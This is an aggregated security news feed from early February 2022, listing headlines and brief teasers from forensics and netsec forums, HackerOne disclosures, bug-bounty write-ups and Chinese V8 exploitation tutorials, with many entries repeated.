    I am new to computer forensics and am having trouble installing autopsy to my Mac. When I am installing autopsy, I get an error when checking the prerequisites for autopsy. Specifically, when I type "sh unix_setup.sh" into terminal, it reads "ERROR: PhotoRec not found, please install the testdisk package." I have installed testdisk so I am just confused why I get this error. Sorry if this is a stupid question, I am just dumbfounded by this error message. submitted by /u/Vekayy [link] [comments]  ( 1 min )
  • Open

    Remote Code Execution on .8x8.com via .NET VSTATE Deserialization
    8x8 disclosed a bug submitted by 0daystolive: https://hackerone.com/reports/1391576
    text injection and content spoofing
    OneWeb disclosed a bug submitted by aman420: https://hackerone.com/reports/1353200
    Reflected Xss in https://world.engelvoelkers.com/...
    Engel & Völkers Technology GmbH disclosed a bug submitted by pl4gue_shell: https://hackerone.com/reports/1401209
    Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1464396 - Bounty: $2000
  • Open

    SecWiki News 2022-02-03 Review
    新姿势绕过应用的ROOT检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-03 Review
    新姿势绕过应用的ROOT检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Tuning in the Hot Spots
    A few months ago, I posted an instructional video on using internet radio servers to tune and listen to AM radio stations in Ukraine and… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 10
    On Jan 20, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was, interesting. We had to figure out… Continue reading on Medium »  ( 2 min )
    Open-source Intelligence. With OSINT Course Giveaway !!
    Open-source Intelligence: Premimum Hacking Course In Free !! Continue reading on Medium »  ( 2 min )
  • Open

    I’m bringing relaying back: A comprehensive guide on relaying anno 2022
    For years now, Internal Penetration Testing teams have been successful in obtaining a foothold or even compromising entire domains through a technique called NTLM relaying. The earliest, most descriptive relaying blog post I could find dates all the way back to 2017 written by Marcello, better known as byt3bl33d3r:https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html At the time of writing this... The post I’m bringing relaying back: A comprehensive guide on relaying anno 2022 appeared first on TrustedSec.  ( 15 min )
  • Open

    SnapFuzz: New fuzzing tool speeds up testing of network applications
    Article URL: https://portswigger.net/daily-swig/snapfuzz-new-fuzzing-tool-speeds-up-testing-of-network-applications Comments URL: https://news.ycombinator.com/item?id=30191854 Points: 17 # Comments: 2  ( 4 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    Exposing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Google is your best friend! Here's the original analysis. Check out the actual Maltego technical details video demonstration here: Enjoy!
  • Open

    What is Red Teaming?
    This blog post was published on PurpleBox website on Feb 2nd, 2022. Continue reading on PurpleBox »  ( 6 min )
  • Open

    从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 我是从starctf 2019的一道叫OOB的题目开始入门的,首先来讲讲这道题。 FreeBuf上有一篇《从一道CTF题零基础学V8漏洞利用》,我觉得对初学者挺友好的,我就是根据这篇文章开始入门v8的漏洞利用。 环境搭建 $ git...
  • Open

    从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 我是从starctf 2019的一道叫OOB的题目开始入门的,首先来讲讲这道题。 FreeBuf上有一篇《从一道CTF题零基础学V8漏洞利用》,我觉得对初学者挺友好的,我就是根据这篇文章开始入门v8的漏洞利用。 环境搭建 $ git...

  • Open

    Debian has not fixed CVE-2021-44142
    Article URL: https://security-tracker.debian.org/tracker/CVE-2021-44142 Comments URL: https://news.ycombinator.com/item?id=30183811 Points: 2 # Comments: 1
  • Open

    WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details
    The holidays are always a busy time for ecommerce stores. Dealing with an influx of Christmas shoppers, holiday sales and inventory, shipping, and at times, also hackers. Today’s investigation starts out much like many others, with our client reporting an antivirus warning appearing only on their checkout page, of course at the worst possible time right around the end of December. What first seemed to be a routine case of credit card theft turned out to be a much more interesting infection that leveraged both font, favicon and other less-commonly used files to pilfer credit card details. Continue reading WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details at Sucuri Blog.
  • Open

    Entry-level Penetration Tester salary in Switzerland?
    What would be an approximate salary range for a penetration tester in Switzerland (Zürich area as a reference)? Not necessary big 4 but also small or medium size companies, for an entry level position, with a master's degree, and a 6-month internship in the field as the only experience. submitted by /u/BroX111 [link] [comments]  ( 1 min )
    How would you fix today's computer security problems?
    UPDATE: My original question was too broad. Please choose which significant problem you might solve based on your expertise. No silver bullet to solve all security problems is necessary. Thanks for your constructive criticism! How would you fix today's computer security problems if you could start any hardware or software company, or create any technology related standard. It could be anything, maybe new hardware and software working together that fixes a major problem like hacking or malware. I don't want to put anyone in a creative box so I'll share my idea later today. Please don't read any results until you have thought of something. Update: How would you protect as many people as possible when you run control a company like Google, Microsoft, Intel, etc., or can pass new laws or create new tech standards. submitted by /u/greyyit [link] [comments]  ( 5 min )
    EDR / XDR on premise
    Hi Anyone knows of useful edr products which could be operated on premise, without using cloud services? Could also just be a so called next gen av at least? Maybe you could even share some experience? All products I know are cloud based and report too much to the cloud (e.g. file paths, user information etc). I've read of Cyberason once, but the link to the on PREM offer is invalid... Bitdefender advertises an edr on prem, but I only know them from a consumer perspective. Thanks! submitted by /u/winschdi [link] [comments]  ( 2 min )
    Scanning for locations.
    Hello, Any tips on scanning slower with gobuster or other tool for finding paths and evade WAF. I'm afraid it will be detected and probably my machine will be blocked by it. submitted by /u/tryingtoworkatm [link] [comments]  ( 1 min )
    How Are Hackers Caught
    If tools like proxies are available to hackers, how are they caught? submitted by /u/Odd_Rip6706 [link] [comments]  ( 4 min )
    Advice deciding between 2 cybersecurity offers at the Big4
    Hey guys, I recently received cybersecurity consultant offers from both KPMG and EY. While I do have a lot of info about each firm based on my interviews and offer letters, I was wondering if there were any former/current employees or anybody here who has worked with these two firms, and if they could share about their experiences? Compensation-wise, EY's is higher. They're both in the same city on the West Coast. Thanks! submitted by /u/bongotw [link] [comments]  ( 2 min )
    Question regarding CTI even that can lead to an incident
    Hi user, I have a question regarding threat intelligence and "incident" response. Let's take an example: I work for Company A. I notice that an access broker sell access to Company B. Company A and Company B work together and have some network connexion to exchange data. In this case, we can suppose that company B will increase our threat risk due to possible lateral movement, but as the threat actor "only" sell an access, we can't determine what kind of threat we will facing. On the business side this will be hard for them to understand that it's a potential threat and we should execute a containment phase by cutting connexion with company B. And for the detection team, we don't have enough info on what kind of threat they should monitor. In your opinion, what should i do ? submitted by /u/octave_ [link] [comments]  ( 2 min )
  • Open

    Using Power Automate for Covert Data Exfiltration in Microsoft 365
    submitted by /u/rsobers [link] [comments]
    Hacking Google Drive Integrations
    submitted by /u/albinowax [link] [comments]
  • Open

    The evolution of a Mac trojan: UpdateAgent’s progression
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 06
    As I’m having so much fun doing the Hacktoria’s geolocation challenges, I have decided to just keep solving them and writing walkthroughs… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 8
    On Jan 16, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was simple but cool. We had to figure out… Continue reading on Medium »  ( 3 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitaion using error based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Serious Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/serious-vulnerability-in-wordpress-plugin-essential-addons-for-elementor-eliminated Comments URL: https://news.ycombinator.com/item?id=30179610 Points: 2 # Comments: 1  ( 3 min )
    Critical Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/critical-vulnerability-in-wordpress-plugin-essential-addons-for-elementor Comments URL: https://news.ycombinator.com/item?id=30179238 Points: 1 # Comments: 0  ( 3 min )
    Fastly patches memory leak HTTP/3 vulnerability in H2O HTTP server project
    Article URL: https://portswigger.net/daily-swig/fastly-patches-memory-leak-http-3-vulnerability-in-h2o-http-server-project Comments URL: https://news.ycombinator.com/item?id=30177816 Points: 3 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-02-02 Review
    安全学术圈2021年度总结 by ourren 2021 年终总结:记我在清华 Apache IoTDB 组的成长 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-02 Review
    安全学术圈2021年度总结 by ourren 2021 年终总结:记我在清华 Apache IoTDB 组的成长 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )
  • Open

    Notional Double Counting Free Collateral Bugfix Review
    Summary Continue reading on Immunefi »  ( 5 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
    How To Spice Up Your Programming Journey With 5 Hacks.
    If you are a beginning programmer like me as much as you love programming, there will be times when you feel down. This is not you been… Continue reading on Medium »  ( 2 min )
  • Open

    Утилитарные компоненты и входное значение sx Material-UI
    Утилитарный компонент Box визуализируется как элемент div и предоставляет возможность применять синтаксис краткой формы записи стилей CSS… Continue reading on Medium »  ( 1 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
  • Open

    Index pages from 973-eht-namuh-973
    https://www.973-eht-namuh-973.com/search-pages/ https://www.973-eht-namuh-973.com/coloured%20site/ https://www.973-eht-namuh-973.com/Black%20and%20White/ https://www.973-eht-namuh-973.com/images/ https://www.973-eht-namuh-973.com/rotators/ https://www.973-eht-namuh-973.com/Alchemy/ https://www.973-eht-namuh-973.com/Magick/ Let me know if there’s others I missed. submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
    Animated movies (sorry if repost)
    submitted by /u/lostsquanderer [link] [comments]
    Large folder of videos pertaining to game design
    http://mirror.reenigne.net/gdc/ submitted by /u/inoculatemedia [link] [comments]
    Old gramophone records
    http://oldgramophonerecords.co.uk/4y1/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Multiple vulnerability leading to account takeover in TikTok SMB subdomain.
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1404612 - Bounty: $999
  • Open

    Recycle bin conundrum
    Have a read only external USB device with a copy of an imaged recycle bin. Goal is to pass off SUB to attorney for review of recycle bin $R files. WIN10 forensic laptop (A) recycle bin is empty, no software running. When plugged into forensic laptop, I can navigate via File Explorer to the recycle bin folders and files. I can open the $R files and SID of user for 2 user accounts. I properly eject SUB and connect to another laptop (B) before passing off to attorney. Laptop (B) is my day to day use laptop. The recycle bin on laptop (B) is empty. Laptop (B) is a WIN10 machine. When I plug SUB into laptop (B) and navigate to recycle bin files, no SIDs, instead recycle bin icons. When I click on the recycle bin icons, no contents. Any ideas on how to resolve this ? submitted by /u/ATXChimera [link] [comments]  ( 1 min )
  • Open

    从 0 开始学 V8 漏洞利用之 V8 通用利用链(二)
    作者:Hcamael@知道创宇404实验室 相关阅读:从 0 开始学 V8 漏洞利用之环境搭建(一) 经过一段时间的研究,先进行一波总结,不过因为刚开始研究没多久,也许有一些局限性,以后如果发现了,再进行修正。 概述 我认为,在搞漏洞利用前都得明确目标。比如打CTF做二进制的题目,大部分情况下,目标都是执行system(/bin/sh)或者execve(/bin/sh,0,0)。 在v8利用...
  • Open

    从 0 开始学 V8 漏洞利用之 V8 通用利用链(二)
    作者:Hcamael@知道创宇404实验室 相关阅读:从 0 开始学 V8 漏洞利用之环境搭建(一) 经过一段时间的研究,先进行一波总结,不过因为刚开始研究没多久,也许有一些局限性,以后如果发现了,再进行修正。 概述 我认为,在搞漏洞利用前都得明确目标。比如打CTF做二进制的题目,大部分情况下,目标都是执行system(/bin/sh)或者execve(/bin/sh,0,0)。 在v8利用...

  • Open

    Newbie investigating hdd
    Hello there, recently acquired some used HDD to try forensics as a student in cyber security. I'm using Kali Linux in forensic mode. Have a few questions : 1) Can using fdisk -l or parted -l modify data on the hdd ? (both launched as root) What about gparted ? (if not touching anything oc) 2) Working as root, is chmod a-w /dev/sde (the drive "location") really useful, like will it really prevent any write even from root ? 3) Created an image with dcfldd, asked for sha1 checksum, and before imaging used sha1sum on /dev/sde. They match. Do anyone work another way ? 4) Tried to import the image on autopsy with different settings but no file or anything else found. Then successfully linked to /dev/loop1 using losetup, but could not mount the "partition" (no filesystem nor partition is detected with parted -l, but gparted tells sde is an ataraid partition). Had some error like "unknown filesystem type 'ddf_raid_member'", so after a bit of digging tried some stuff with mdamd, but did not work. Any idea ? submitted by /u/ner00n [link] [comments]  ( 2 min )
    Creating Encase Image of Macbook Pro Max (A2485)
    Hi everyone, ​ I want to create an encase-image from a MacBook (Model A2485, M1 Max) but any of my attempt so far just have failed. Password is known and I have physical access to the device. Following things I allready tried: - boot external usb with Paladin Edge -> failed to boot from it (tried to allow Booting from external sources via recovery, but there was no option for enabling) - put the MacBook into targetdisk mode an connected it to another iMac -> tried to create an image via ewfaquire but the shared disk wasn't an extra device (or I failed to see it) - boot external usb with Paladin Edge on another iMac, put the MacBook into targetdisk mode an connected it to the iMac -> Paladin Edge doesn't recognize the shared disc My last idea is just to do a timemachine backup from the macbook to a clean / wiped hdd and create an encase image from it ... Does someone have any other ideas? Would be very happy about any suggestions! Thanks in advance! submitted by /u/frcGuy81 [link] [comments]  ( 2 min )
  • Open

    Inside Trickbot, Russia’s Notorious Ransomware Gang
    submitted by /u/CyberMasterV [link] [comments]
    New Hybrid Campaign OiVaVoii Uses Malicious OAuth Apps | Cyware Hacker News
    submitted by /u/ITlocknkey [link] [comments]
    Using PwnKit-Hunter to check for CVE-2021-4034 Vulnerable Systems
    submitted by /u/jat0369 [link] [comments]
    Remote root vulnerability for Samba (CVE 2021-44142)
    submitted by /u/lormayna [link] [comments]  ( 1 min )
  • Open

    Twitter stores original account names, dox vulnerability via Twitter Spaces
    Article URL: https://twitter.com/tszzl/status/1488466979799265281 Comments URL: https://news.ycombinator.com/item?id=30169435 Points: 31 # Comments: 1  ( 1 min )
    Arbitrary code execution vulnerability in Samba
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30166148 Points: 3 # Comments: 0  ( 1 min )
    High severity vulnerability in Element Desktop 1.9.6 and earlier
    Article URL: https://matrix.org/blog/2022/01/31/high-severity-vulnerability-in-element-desktop-1-9-6-and-earlier/ Comments URL: https://news.ycombinator.com/item?id=30163784 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SQL injection at /admin.php?/cp/members/create
    ExpressionEngine disclosed a bug submitted by khoabda1: https://hackerone.com/reports/968240
    Information disclosure-Referer leak
    Brave Software disclosed a bug submitted by kkarfalcon: https://hackerone.com/reports/1337624 - Bounty: $500
    The Return of the Grinch
    h1-ctf disclosed a bug submitted by w31rd0: https://hackerone.com/reports/1433581 - Bounty: $1000
    Saving Christmas from Grinchy Gods
    h1-ctf disclosed a bug submitted by akshansh: https://hackerone.com/reports/1434017 - Bounty: $1000
    Full Response SSRF via Google Drive
    Dropbox disclosed a bug submitted by bugdiscloseguys: https://hackerone.com/reports/1406938 - Bounty: $17576
    Reflected Xss On https://vk.com/search
    VK.com disclosed a bug submitted by b4walid: https://hackerone.com/reports/1454359 - Bounty: $500
  • Open

    [Question] How are these directories discovered? Is it random web-surfing then sharing? Or do some of you use crawlers?
    Basically says it all in the title! I just found this sub-reddit, VERY COOL! I am a /r/datahoarder and I appreciate this sort of thing! I am just curious to how these open directories are discovered. Thanks all for being apart of this community! submitted by /u/cs_legend_93 [link] [comments]  ( 1 min )
    Does anyone have OD-Shots uploaded in 2019 and 2020?
    I'm looking for .xlsx files that were posted in 2019/2020 on this sub, because the links that were uploaded are now dead. Does anyone saved them and can upload them once again? Again, i'm not looking for last upload but files that were shared earlier. submitted by /u/GingrFattyJesusFreak [link] [comments]  ( 1 min )
    Filechef not working???
    Does anyone know if https://www.filechef.com/ is down??? submitted by /u/klutz50 [link] [comments]
    photos and documents relating to Russian involvement in Ukraine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    high res images of Russian dairy products
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    No Rate Limiting on OTP sending
    Firstly I would like to say that this is my first ever writeup for the InfoSec community and I may not be so good at presenting the… Continue reading on Medium »  ( 2 min )
    Theoretical Bugs With No Impact Don’t Get Paid — Here’s Why
    As a whitehat, it’s easy to want to submit as many bugs as possible to a project — especially projects on Immunefi, because the bounties… Continue reading on Immunefi »  ( 2 min )
    H1-CTF Hacky Holidays Writeup
    Hey everyone i hope you all are fine and doing good, In December Hackerone made a 12 day 12 level CTF called Hacky-Holidays which had 12… Continue reading on Medium »  ( 8 min )
    My experience of Hacking The Dutch Government
    Hi Everyone! , Continue reading on Medium »  ( 2 min )
    OSINT Tips for Penetration Testing
    In this article, we will discuss some of my favorite OSINT techniques that can help during your penetration testing activities. Continue reading on Medium »  ( 1 min )
    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022! Continue reading on InfoSec Write-ups »  ( 2 min )
    Password Spraying Attack
    Hello everyone! 🎉 Continue reading on Medium »  ( 1 min )
    A Peculiar Case of XSS and my first bug
    Hello everyone, I am new to security stuff and will share how I was able to get few XSS in not so common way. Continue reading on Medium »  ( 1 min )
    IDOR vulnerability on invoice and weak password reset leads to account take over
    This year I started doing bug bounties and I only got valid p5 report and my report for p4 and p3 got rejected. Continue reading on Medium »  ( 3 min )
    Understanding Automation in Bug Bounty
    ==UNDER CONSTRUCTI Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Continue reading on Medium »
  • Open

    Question on using VMware pro and Nessus, isolating one VM from communication with internet.
    I need help running vuln scan using vm workstation pro and Nessus :/ Looking for advice/help on vuln. scanning using VMware workstation pro and Nessus Hey folks!!! I am looking to run Nessus on one VM, and run the vulnerability scan on a second VM. My constraints are that the VM running Nessus should be able to access/communicate out to the internet, while the VM being scanned should not be able to communicate to the internet — it should only be able to communicate with the VM performing the Nessus scan. I tried setting up both VMs on a host only VMnet, but Nessus was not able to get or use certain plugins that way. I’m looking for any help or advice setting this up how I described as I have not been successful. Thanks in advance for any help! submitted by /u/enki0817 [link] [comments]  ( 1 min )
    IRM/document encryption... Why isn't it used more?
    I'm a MS:CS student taking some cybersecurity classes. We learned about IRM, basically symmetrically encrypted documents with the keys managed by a central server backed via AD or whatever the org uses for AAA. It sounds pretty useful for dealing with vendors and helping deter exfiltration (and as a bonus, leaked docs encrypted at rest can't easily be used to extort ransoms), but it doesn't sound like very many places use it. Are the downsides of cost, difficulty of use for the the user, and vendor lock-in a deal breaker for a lot of enterprises? Is the prevailing view that since someone can still take pictures of the screen with their phone, it's not worth the effort? Or that this kind of threat isn't considered to be very serious? What other real world issues am I not considering? Cheers submitted by /u/berrmal64 [link] [comments]  ( 4 min )
    Help me guys
    I have downloaded 2 photo recovery apps from playatore into my phone. But I am scared that they might be fake apps which steals photos. I have checked the privacy policy in which it was statated that The information that I request will be retained on your device and is not collected by me in any way. But now im not sure whethet i can trust them. The apps seem to be fake with manipulated reviews. Where would all my photos go to if they are sus apps? Do you guys think that they are sus apps by high chances? It would be nice if I get replies... Thank you! submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    Has my NVR been hacked?
    Was just looking at my IDS alerts on my pfSense router and noticed the following entries seen in the screenshot here https://imgur.com/a/AMfpMaH. I've done a whois on some of the source IP addresses and they're questionable, to say the least. The device in question is a Hikvision NVR. My main concern is, has my NVR been hacked and turned into a TOR relay/exit node? Is there anything I can do to test this? I also want to point out that I don't have any ports opened facing the internet for this NVR which is also a bit weird as I thought that would offer me more protection! TIA submitted by /u/Bosshogg226 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Solidity Audit & Ethereum Smart Contract Analysis using Mythril - Blockchain Security #2
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Exposing the "InFraud Organization" - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Amazing! Feel like it's 2007 -- check out the slides here including the technical details here which I produced for https://whoisxmlapi.com here including the following Maltego technical details video demonstration video: Enjoy!
  • Open

    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
  • Open

    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
  • Open

    RCE in Samba(CVE-2021-44142)
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30158662 Points: 3 # Comments: 0  ( 1 min )
  • Open

    从 0 开始学 V8 漏洞利用之环境搭建(一)
    作者:Hcamael@知道创宇404实验室 最近因为某些原因开始学V8的漏洞利用,所以打算写一个系列的文章来记录一下我的学习过程。 概述 在开始研究V8之前肯定得有相应版本的环境,搭建v8环境的教程网上挺多的。在国内搭建环境,因为众所周知的原因,我们会遇到第一个瓶颈,网络瓶颈。不过也挺好解决的,把环境搭在vps上,网速是最快的。不过随后就会遇到第二个瓶颈,性能瓶颈,自用的vps一般性能都是1...
  • Open

    从 0 开始学 V8 漏洞利用之环境搭建(一)
    作者:Hcamael@知道创宇404实验室 最近因为某些原因开始学V8的漏洞利用,所以打算写一个系列的文章来记录一下我的学习过程。 概述 在开始研究V8之前肯定得有相应版本的环境,搭建v8环境的教程网上挺多的。在国内搭建环境,因为众所周知的原因,我们会遇到第一个瓶颈,网络瓶颈。不过也挺好解决的,把环境搭在vps上,网速是最快的。不过随后就会遇到第二个瓶颈,性能瓶颈,自用的vps一般性能都是1...
  • Open

    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    TheHuzz: Instruction Fuzzing of Processors Using Golden-Reference Models
    Article URL: https://arxiv.org/abs/2201.09941 Comments URL: https://news.ycombinator.com/item?id=30156948 Points: 1 # Comments: 0  ( 2 min )

  • Open

    Analyzing Malware with Hooks, Stomps and Return-addresses
    submitted by /u/jat0369 [link] [comments]
    Don't trust comments
    submitted by /u/crower [link] [comments]
